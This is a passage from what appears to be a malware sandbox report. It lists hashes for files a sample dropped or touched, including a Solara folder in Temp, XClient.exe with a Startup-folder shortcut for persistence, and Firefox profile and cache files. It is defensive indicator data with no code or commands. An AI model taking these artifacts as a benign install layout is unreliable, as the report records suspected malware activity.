| SHA512 | 74a8b2ec79676238745fc268c1f91ebdf06065f82471a40bc42fb52c3bc64fdce5b3ed91bf4af2efee1889b275dcbbc58767795c06e74c36501f0ed673a363e6 |
memory/3548-1337-0x00000215ED3D0000-0x00000215ED3D1000-memory.dmp
memory/3548-1336-0x00000215ED3D0000-0x00000215ED3D1000-memory.dmp
memory/3548-1335-0x00000215ED3D0000-0x00000215ED3D1000-memory.dmp
memory/3548-1347-0x00000215ED3D0000-0x00000215ED3D1000-memory.dmp
memory/3548-1346-0x00000215ED3D0000-0x00000215ED3D1000-memory.dmp
memory/3548-1345-0x00000215ED3D0000-0x00000215ED3D1000-memory.dmp
memory/3548-1344-0x00000215ED3D0000-0x00000215ED3D1000-memory.dmp
memory/3548-1343-0x00000215ED3D0000-0x00000215ED3D1000-memory.dmp
memory/3548-1342-0x00000215ED3D0000-0x00000215ED3D1000-memory.dmp
memory/3548-1341-0x00000215ED3D0000-0x00000215ED3D1000-memory.dmp
memory/2920-1354-0x0000000001040000-0x0000000001052000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 8c5d9186a2d7bff0f0c28df3ba9d2eec |
| SHA1 | 38d2ace6d0296018a761b6d1f21b4c40703c49ad |
| SHA256 | a8ae6df8dfaa258c95bca578f70df886c6cbeb5afc08c87fab90d37037d38006 |
| SHA512 | 8394421dc3c69cbbb1012a0447d1d0294ab5cbbdc33786ba312a9d41619bbabf6eca5261f9d87c4807378f4e87e661905d174ead1b5ff15b3fd340d2f6f60bb4 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\hasown\.nycrc
| MD5 | c2ab942102236f987048d0d84d73d960 |
| SHA1 | 95462172699187ac02eaec6074024b26e6d71cff |
| SHA256 | 948366fea3b423a46366326d0bb2e54b08abd1cf0b243678ba6625740c40da5a |
| SHA512 | e36b20c16ceeb090750f3865efc8d7fd983ae4e8b41c30cc3865d2fd4925bf5902627e1f1ed46c0ff2453f076ef9de34be899ef57754b29cd158440071318479 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\get-intrinsic\.nycrc
| MD5 | d0104f79f0b4f03bbcd3b287fa04cf8c |
| SHA1 | 54f9d7adf8943cb07f821435bb269eb4ba40ccc2 |
| SHA256 | 997785c50b0773e5e18bf15550fbf57823c634fefe623cd37b3c83696402ad0a |
| SHA512 | daf9b5445cfc02397f398adfa0258f2489b70699dfec6ca7e5b85afe5671fdcabe59edee332f718f5e5778feb1e301778dffe93bb28c1c0914f669659bad39c6 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\has-proto\.eslintrc
| MD5 | c28b0fe9be6e306cc2ad30fe00e3db10 |
| SHA1 | af79c81bd61c9a937fca18425dd84cdf8317c8b9 |
| SHA256 | 0694050195fc694c5846b0a2a66b437ac775da988f0a779c55fb892597f7f641 |
| SHA512 | e3eca17804522ffa4f41e836e76e397a310a20e8261a38115b67e8b644444153039d04198fb470f45be2997d2c7a72b15bd4771a02c741b3cbc072ea6ef432e9 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
| MD5 | 7300162b07211df497d8157d0bc4f2cb |
| SHA1 | 97095f5cac3e97eeb68cc2eeeb411d18b2305034 |
| SHA256 | d666e25a5760de072f751cfe78e401594e74540cfa872522fe78611bb720598c |
| SHA512 | 96c76e9bb11e3f47432ed070f2d7c6aded2b612a13baad9dede33804d7ae8f427ba1e33b00d38cff4d4fefab2c8f5724f13a1f2cc37fdce3210c94b148e51add |
C:\Users\Admin\XClient.exe
| MD5 | c32ca4acfcc635ec1ea6ed8a34df5fac |
| SHA1 | f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919 |
| SHA256 | 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70 |
| SHA512 | 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc |
memory/2108-2207-0x0000000005630000-0x000000000563E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\vary\LICENSE
| MD5 | 13babc4f212ce635d68da544339c962b |
| SHA1 | 4881ad2ec8eb2470a7049421047c6d076f48f1de |
| SHA256 | bd47ce7b88c7759630d1e2b9fcfa170a0f1fde522be09e13fb1581a79d090400 |
| SHA512 | 40e30174433408e0e2ed46d24373b12def47f545d9183b7bce28d4ddd8c8bb528075c7f20e118f37661db9f1bba358999d81a14425eb3e0a4a20865dfcb53182 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
| MD5 | d84e7f79f4f0d7074802d2d6e6f3579e |
| SHA1 | 494937256229ef022ff05855c3d410ac3e7df721 |
| SHA256 | dcfc2b4fa3185df415855ec54395d9c36612f68100d046d8c69659da01f7d227 |
| SHA512 | ed7b0ac098c8184b611b83158eaa86619001e74dba079d398b34ac694ce404ba133c2baf43051840132d6a3a089a375550072543b9fab2549d57320d13502260 |
memory/6464-2835-0x0000016941830000-0x000001694184A000-memory.dmp
memory/2920-2836-0x0000000074BF0000-0x00000000753A0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Wpf.Ui.dll
| MD5 | aead90ab96e2853f59be27c4ec1e4853 |
| SHA1 | 43cdedde26488d3209e17efff9a51e1f944eb35f |
| SHA256 | 46cfbe804b29c500ebc0b39372e64c4c8b4f7a8e9b220b5f26a9adf42fcb2aed |
| SHA512 | f5044f2ee63906287460b9adabfcf3c93c60b51c86549e33474c4d7f81c4f86cd03cd611df94de31804c53006977874b8deb67c4bf9ea1c2b70c459b3a44b38d |
memory/6464-2843-0x000001695C350000-0x000001695C88C000-memory.dmp
memory/6464-2847-0x000001695BFC0000-0x000001695C07A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Newtonsoft.Json.dll
| MD5 | 195ffb7167db3219b217c4fd439eedd6 |
| SHA1 | 1e76e6099570ede620b76ed47cf8d03a936d49f8 |
| SHA256 | e1e27af7b07eeedf5ce71a9255f0422816a6fc5849a483c6714e1b472044fa9d |
| SHA512 | 56eb7f070929b239642dab729537dde2c2287bdb852ad9e80b5358c74b14bc2b2dded910d0e3b6304ea27eb587e5f19db0a92e1cbae6a70fb20b4ef05057e4ac |
memory/6464-2849-0x000001695C080000-0x000001695C132000-memory.dmp
memory/6464-2872-0x000001695BF90000-0x000001695BFB2000-memory.dmp
memory/6464-2878-0x000001695BF80000-0x000001695BF8E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.Wpf.dll
| MD5 | 34ec990ed346ec6a4f14841b12280c20 |
| SHA1 | 6587164274a1ae7f47bdb9d71d066b83241576f0 |
| SHA256 | 1e987b22cd011e4396a0805c73539586b67df172df75e3dded16a77d31850409 |
| SHA512 | b565015ca4b11b79ecbc8127f1fd40c986948050f1caefdd371d34ed2136af0aabf100863dc6fd16d67e3751d44ee13835ea9bf981ac0238165749c4987d1ae0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\storage\default\https+++www.roblox.com\ls\usage
| MD5 | e74b4798971593d3e235d83de242638b |
| SHA1 | 2778b19ad793ab9ce3f7a88fce5dca3b97c03999 |
| SHA256 | e6958dab05954d538c34b5cc46c6d16af86f139ec365fa62713b4f8692f19950 |
| SHA512 | a7807d1788f96e41e806ae361dfcc0b9971845702d3f493607627ca5a9eb03000056e683aab617e03bac0f4d2e7ba65a8e103136bb65976cbf49f933a55609d1 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.Core.dll
| MD5 | 851fee9a41856b588847cf8272645f58 |
| SHA1 | ee185a1ff257c86eb19d30a191bf0695d5ac72a1 |
| SHA256 | 5e7faee6b8230ca3b97ce9542b914db3abbbd1cb14fd95a39497aaad4c1094ca |
| SHA512 | cf5c70984cf33e12cf57116da1f282a5bd6433c570831c185253d13463b0b9a0b9387d4d1bf4dddab3292a5d9ba96d66b6812e9d7ebc5eb35cb96eea2741348f |
memory/6464-2910-0x000001695CB90000-0x000001695CC0E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\WebView2Loader.dll
| MD5 | a0bd0d1a66e7c7f1d97aedecdafb933f |
| SHA1 | dd109ac34beb8289030e4ec0a026297b793f64a3 |
| SHA256 | 79d7e45f8631e8d2541d01bfb5a49a3a090be72b3d465389a2d684680fee2e36 |
| SHA512 | 2a50ae5c7234a44b29f82ebc2e3cfed37bf69294eb00b2dc8905c61259975b2f3a059c67aeab862f002752454d195f7191d9b82b056f6ef22d6e1b0bb3673d50 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.dll
| MD5 | a4e469b250ddd6b7bf49530074eb58d6 |
| SHA1 | b453b13beef7d25bc0675fe68177e5bd2a3b3a22 |
| SHA256 | d0123ecdd83962566e620da8f4dbb3a254ed614370d67a07f6c26c3ebbd12c06 |
| SHA512 | af21f10ed6ce8b1e98be439f05786dee2dbbe4d5930853ec383f607a9c03b94609d35234bc793422768c1eda342376ca8bb87d6f3a02f30af9fcf37a0cff1bea |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\vcruntime140.dll
| MD5 | 7a2b8cfcd543f6e4ebca43162b67d610 |
| SHA1 | c1c45a326249bf0ccd2be2fbd412f1a62fb67024 |
| SHA256 | 7d7ca28235fba5603a7f40514a552ac7efaa67a5d5792bb06273916aa8565c5f |
| SHA512 | e38304fb9c5af855c1134f542adf72cde159fab64385533eafa5bb6e374f19b5a29c0cb5516fc5da5c0b5ac47c2f6420792e0ac8ddff11e749832a7b7f3eb5c8 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\zlib1.dll
| MD5 | 75365924730b0b2c1a6ee9028ef07685 |
| SHA1 | a10687c37deb2ce5422140b541a64ac15534250f |
| SHA256 | 945e7f5d09938b7769a4e68f4ef01406e5af9f40db952cba05ddb3431dd1911b |
| SHA512 | c1e31c18903e657203ae847c9af601b1eb38efa95cb5fa7c1b75f84a2cba9023d08f1315c9bb2d59b53256dfdb3bac89930252138475491b21749471adc129a1 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\libcurl.dll
| MD5 | e31f5136d91bad0fcbce053aac798a30 |
| SHA1 | ee785d2546aec4803bcae08cdebfd5d168c42337 |
| SHA256 | ee94e2201870536522047e6d7fe7b903a63cd2e13e20c8fffc86d0e95361e671 |
| SHA512 | a1543eb1d10d25efb44f9eaa0673c82bfac5173055d04c0f3be4792984635a7c774df57a8e289f840627754a4e595b855d299070d469e0f1e637c3f35274abe6 |
memory/6464-2947-0x0000000180000000-0x0000000180A5B000-memory.dmp
memory/6464-3012-0x0000000180000000-0x0000000180A5B000-memory.dmp
memory/6464-3013-0x0000000180000000-0x0000000180A5B000-memory.dmp
memory/6464-3011-0x0000000180000000-0x0000000180A5B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\bin\path.txt
| MD5 | 5354e035488ec7a05f0b55b17f7c2312 |
| SHA1 | cb54e391bf0bfab126e4c336f75ce13d894314e2 |
| SHA256 | ff99b27c03e0bcfc2f0f9c3b670869791940e616786924db009431851ec68bc3 |
| SHA512 | b990580487b332448f244b553d60c1906ed0385abda6118bfba1e95e642fdf69251dcccc6938501c92d177f755f04afb071b6bfa2246cd80107d3688505564b1 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.WinForms.dll
| MD5 | 4cf94ffa50fd9bdc0bb93cceaede0629 |
| SHA1 | 3e30eca720f4c2a708ec53fd7f1ba9e778b4f95f |
| SHA256 | 50b2e46c99076f6fa9c33e0a98f0fe3a2809a7c647bb509066e58f4c7685d7e6 |
| SHA512 | dc400518ef2f68920d90f1ce66fbb8f4dde2294e0efeecd3d9329aa7a66e1ab53487b120e13e15f227ea51784f90208c72d7fbfa9330d9b71dd9a1a727d11f98 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\31182
| MD5 | c5e516d65aae9cf36ebf2f4d68822507 |
| SHA1 | b289b3308daf81ffa3da26a34044bd07e48f5d7d |
| SHA256 | 5d228e82f91ce991f068238302417b84d9725f687fcce1525af7bacca6d68dfc |
| SHA512 | ecf6dc0a4e792c3b8c36a5a1fff0e80fd39ad75018110718b62321ba25c68ee3a1f275c0e2a948d6b40bb22e6cdd0565e0140b09f7762858990189a05d6147ac |
memory/6464-3080-0x000001695C330000-0x000001695C338000-memory.dmp
memory/6464-3088-0x000001695FE80000-0x000001695FE8E000-memory.dmp
memory/6464-3087-0x000001695FEB0000-0x000001695FEE8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad\settings.dat
| MD5 | 4914c1ebe73b458b98556cce93929e83 |
| SHA1 | 600f67c02f92f83cbb8784a1d582288f5eeaa3dc |
| SHA256 | e55d0bbf242a7f77d2224d4206f9525fbc65d6a3ee5a667105bb75ab79c5868c |
| SHA512 | ed0dfc97c8e294d55ee7bcee17e271cafefee778b9194bf9124320810c82c0e05076e1799696cfbe45e62696c17f08ee8beff4865e35702cec0058d3776856c8 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad\throttle_store.dat
| MD5 | 9e4e94633b73f4a7680240a0ffd6cd2c |
| SHA1 | e68e02453ce22736169a56fdb59043d33668368f |
| SHA256 | 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304 |
| SHA512 | 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\4106
| MD5 | d21b4c3b6ac9423a1605bb6963bcd357 |
| SHA1 | c90f9dc4c2f6e7f551009b696028370c901991bc |
| SHA256 | 570b784f043d63e2cfdc37567acb4b22004d1cc19a7b43fb0e8224318ca59c4c |
| SHA512 | 37eed499187258c65d0c4a3c3b03a40dcad7fca26c6b04e2fe07a43657b2e39263a0cf22dc36124dbbcf6342890f3c53868bdb925366e3ae15555e871e9813bf |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\2469
| MD5 | a4c28e41f558a72018701b84ad4ccf4a |
| SHA1 | b5767e13a58026ce24f052cb174f37312eb960d2 |
| SHA256 | 7e32b6a915539b1e4b38be22d6275081640215cc809c98289fd722e58d30fc2f |
| SHA512 | f0a749db73bac4f1c44629321a0e691838eb56c351584b419336122adb5bc99c1b31b227da41c39c59d176a38cf6179b7f80cf3bbb3ad3cd0eca8b6f14faae8a |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\22461
| MD5 | b7ce6fe1fe4a9aae92d6d6175fbc39a1 |
| SHA1 | 487e7fe516fa77d73bf48fd18008c78115584247 |
| SHA256 | af812b897625157861635d3d0bdf81a716f790d050c545bc8111cae9fc4a01d6 |
| SHA512 | b311122969c122e9647981dfafa693987547643c48479a4c940a4bb1b7d9d5818ebe0f3b92963c07292ecc85a7301567bc597e9918100c19b040fb8f994f0638 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\16440
| MD5 | 2008f2c8c78166deacf46520b8efde1c |
| SHA1 | d1896db463ad9fac46678ba3cdd03e9285de7c9d |
| SHA256 | 0c7824f2f146fc2a28a7ca857c5e80d75b4f95c7b9cc2e50fde038c8490c6033 |
| SHA512 | 9615919f78e2cd9e4565aa991b90c9df393effa9a0e258a8866df6d7a7cd3f91d91b27c02144eed9c1b588718197ed90043a1421e82e5deb88172b3e6c0d545a |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\31074
| MD5 | 1fd466ce7cb7d6d5d5ab4d0753f5d41d |
| SHA1 | 4b93223b6ad725147516addd3523d2730f0ed19c |
| SHA256 | 52ede2888f4cf588934a629f149368297c58f2f2bb10ac616bb3dc74f46bda5b |
| SHA512 | 9826a5a18610e63e8fb54b96b6c619ba5f806e7122220c1574790011a9420a895568d9dec57557ee5229a91bb7d67d6c01de0f936f3501ceefe993b10b7dcd54 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\8114
| MD5 | 53884bff0b5ce266abd64a116288ca6f |
| SHA1 | cc88a6599d97de053bda2cc3e8a211f6f30c2786 |
| SHA256 | 44709c793e62ec5f1e47e5b6d53921b924cd1ebcca8ad87a3df006d8411337f0 |
| SHA512 | 26e52fa3c770fd7783250a51f150d3de4a9bf0354b48672a006d1ffa8c5342a98856dd637102181102903a85760351bf7292f383be8d3f7110d1ab95990a78d8 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\8114
| MD5 | f0af0b1897490c32490efca96593f608 |
| SHA1 | ba77a49e2e499fd689d436949d1093cbb3f559c3 |
| SHA256 | dfbda3ecc43c05bce8a70d73721e39a1348b9a6c313e414e792249ee12219d78 |
| SHA512 | a8484a4a3038a85ca64f71e95b08abaab304616e0c6a3339b46e6808aa6551cc11b7d28d1998d14d7d0d8b8e753524ccaaa52da33b561043f1649516bfc6a384 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\14982
| MD5 | a8ca2b319436e5db078bb3e418efcebf |
| SHA1 | 3af56b8254f2d384124229234a8b964ef4c58218 |
| SHA256 | da255d4cea3ed492cae5f9e746176f2129c3f2aec58f4c26817151901ec1cc85 |
| SHA512 | 0a1febba49ae6756e875cf26e23cb2f3a3fc84f2a6a8f13a0ba6645f24fe8bf822884ad90f14ff928950c748c7a2b817ece2990afd2256a0d3b2f01a76751f50 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\20975
| MD5 | cf4853380233ac649e88d8ab7d9e53d1 |
| SHA1 | d22c76cbc9ddb15d8009a71bdd1929bd9bf1171f |
| SHA256 | 0239db3bce364946ed5d646435b8d6cf253bf6e78689a8142875a5f9b6be6111 |
| SHA512 | 492794bb55ca1f7bf154a9945aa34e1730d5be7ff08dea67fa0c773bebe1bd54bc4c42f4265e20df2ba5d202280906b53d39c88088a0301a0c176f3db0113f46 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\27866
| MD5 | 48d3e3af822bea11ef514b4e8f22a811 |
| SHA1 | 39aff458c2b248220e5c322efe474171d8765819 |
| SHA256 | d1b165516d11ac281a326cbf417fc58756f6cee4d70cd445ad1b97e7e683b0c4 |
| SHA512 | 09c4cfaf9116396ad06f86351293d4a193d0cb57875eaa4916a4a8ada4371a0dd00f2c42c290f9361ec1279e385bb69ca84758117dd30d721276d5b5a68df891 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\23389
| MD5 | 1d821f910d776aa2cd2e62f67ce43dee |
| SHA1 | 81ec42bf917967d9bdb6c241c97983b9fd3950e8 |
| SHA256 | 9a419acb94c072b2b7082526a91cac4f9d9297978d71215992b7b1958b2fbc0a |
| SHA512 | 09b77fd1b8424386ce25c0135f5bea434ad69154968ba5fbf3d5c29268164c1704f818e6e4794bc45f8ce569325cc3485c44cf3280a408483a79c4c07e9d9d79 |
memory/6464-3194-0x00007FFDBA130000-0x00007FFDBA154000-memory.dmp
memory/6464-3193-0x0000000180000000-0x0000000180A5B000-memory.dmp
memory/6244-3212-0x00007FFDD8290000-0x00007FFDD8291000-memory.dmp
\??\pipe\crashpad_6580_LWALGUCIWGAEKJFG
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Extension Rules\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State
| MD5 | 40eaf48ddaaafb53dbd771345cf82512 |
| SHA1 | 70b88f3b2552ef91f0d64c9387a60ea5d3974dac |
| SHA256 | 8fea31880e63e3c6e33cbd04c434b328ca11c027af0975c71413ca30770403bf |
| SHA512 | d8e6213e5332eeaf1e35da7d5a0390d11bff37210c34f317d3b9b278c7fecac7ecc572a56e7fce4976b830088238efd9b54ab23a8a2e8ac34c8f2792dd8c6287 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State~RFe5ac758.TMP
| MD5 | ebb8e50681dc207d2204719f9b567a15 |
| SHA1 | 7288c7563d5c99b2e626c013059863f196d06ff9 |
| SHA256 | 91035064a699783a4b7174ba12aad2533158da73071da6ed07e09dd5361925f9 |
| SHA512 | c6f7d10996a9fb36499a03adeee78472e42bf4021c6bf8779a7f3afb623cecbcef012a045fe0edb537fee30cd4a71ad8225bbf90dfd28883df36fbb95102ad28 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad\settings.dat
| MD5 | 7acaed94ade61d3c0e5fca2781c7f76c |
| SHA1 | d6a800084272907afb49be0da44ad68c5b12c7d5 |
| SHA256 | 7d257003ac44c672d3d118cd5702e4a0ae971dc47453ec4fe58a6f3774d910fa |
| SHA512 | 85ca98e2a777868f8a7b3151b5e36fa79f32b3f9bfa76b99a765dadf372be59671b79b63aa1c52e966d9802045d8387aa7dd9856a96b9fe5bfd837c76d57de03 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Sync Data\LevelDB\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\15368
| MD5 | 350e1ed407a7f8f4a837a4c1c07ddf19 |
| SHA1 | c29df0a0f244e28ac00bc78b8ae0abf2d9a45ff3 |
| SHA256 | 937595ed9b479b6c833a5cd31bbf3c2e55d5a107406513fb1d63512ce4652637 |
| SHA512 | 3524538ed5c807182aab9b1a6d605a8ab9ccaaa3dcee561de70e122a1e3df8be37d32813085b143ba4f42f1ef2a16bde8c9089b015ecf38b2f86376ec9f8d06d |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\13909
| MD5 | 22f422620b1645edcd0a1b31178fa667 |
| SHA1 | b84a243e7e5dbfe9ed85e3d0bd6eba4a79c5ffc9 |
| SHA256 | f836455b7856f7e90dc2331f7c2b2e86b4703c966505efc6ad8339614cb9fec4 |
| SHA512 | 638a0bdb2cb35899310d33079db619651e5268e39e94c7b57cc1203298fcc6823ac5d597ae4ddd29aee6fa222e3a81d486a73fd9d9bdee577ffbd17a852f5819 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\20889
| MD5 | fe98367d66308e52d7c7969144395a8a |
| SHA1 | f488f0cbff9b9c23d956d3ec6814beedd5a2a220 |
| SHA256 | 415ad48490d8b9787d4de810a551d97a4704b44f2f42ac550a0362a4d04b5e01 |
| SHA512 | 424cb6b59185983ae22a3395769a2b3008de8e45e087a8e7719f1e12202da88e1b656f32912721200b1d37ff19c7855e23fb87e9124b61a3b0de65b27ca13f96 |
memory/6436-3279-0x00007FFDD7F30000-0x00007FFDD7F31000-memory.dmp
memory/6436-3278-0x00007FFDD8FE0000-0x00007FFDD8FE1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State
| MD5 | e3f3165251d35ce544c7bc00245ebc94 |
| SHA1 | f2b03ad591fbe93f44b66bb3b9c95c9bf5ce161f |
| SHA256 | 589478787c6aaa7055c75ff7be267935e8c978b8c775aecb49544a0d8e4ea5c3 |
| SHA512 | 6fe41f57646825e25ae0aae40d7391d5856f05d0a8633a6d77297b30178b17e316e095d9d3f88eb811df19c1ada867adfc00006265d47cb8e5152218aa894d00 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\19229
| MD5 | 937445507c38fb54f8aba6a61e843746 |
| SHA1 | d446e25a2fb8f877fc54975ac698602a8ace205d |
| SHA256 | 0d089b3b4ab0dc03372e4b41098f865bae341fe3d653c036d98dc14472af0e13 |
| SHA512 | 4c191f161e2ea6d1f341ee353fd40a759357ee2a0abaf08472d3c663129cdc613cc61346cbee03db62f3e65419707da4164a8a5dc69c08c9adcd2e226d5c927c |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\9432
| MD5 | 0eda4de408a4b10a1f9b6d534abfbf0b |
| SHA1 | 041973c670612dc410796de8ac55d53e9f0f1b55 |
| SHA256 | 4a9d96dd3c2391d7865a61727791f0c1a8390fc63a1a4602c535f9a0bc41d5ad |
| SHA512 | 2e2d871e5fa11536fd38e7b373d125aa2cc19df4cd5bd44675719cc7fa894281e4a5ed5463e2a878f198d3f4e8098b9ae7f9412ba9bf58335276e10b99fcd66a |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\22618
| MD5 | 56c25c74c7af2bee6a621401b8f7f5c4 |
| SHA1 | e1c23a466bbbcd625ea350c999c40811cbb1012f |
| SHA256 | 341d38ee8a7ed8bace7c6cf14d49e49e35bc7b958ea9a0a2f56fcfcc545653dd |
| SHA512 | 1b1f409db74d95aa2c55cd7323eeb4deeb01c943933e3c9df84c5315da336904e958896d235915f5e5b2426a200272e8d4672716c37f6b0953a4dea6d43627d3 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\entries\A14C26BA4DDEF07ECA3E158614497D4ED03032A2
| MD5 | 4e13b60927b14cf7ce0c432c8ade1a56 |
| SHA1 | 390f9c4eb4ac22ac37372155a165e68cb5f443a6 |
| SHA256 | 4c24e5edba2fee1681313714088aa9dee3ed8f8cf14b1381381db3e6e936368a |
| SHA512 | fd13fdaa87a53c4c9ba11346081b640331a09111b4cf8ce008aabe81cf36f40fec45761d793a6a039535b32703805dea664ff8f97c666ddddf3aea33590ab2e5 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\DawnCache\data_3
| MD5 | 41876349cb12d6db992f1309f22df3f0 |
| SHA1 | 5cf26b3420fc0302cd0a71e8d029739b8765be27 |
| SHA256 | e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c |
| SHA512 | e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\DawnCache\data_2
| MD5 | 0962291d6d367570bee5454721c17e11 |
| SHA1 | 59d10a893ef321a706a9255176761366115bedcb |
| SHA256 | ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7 |
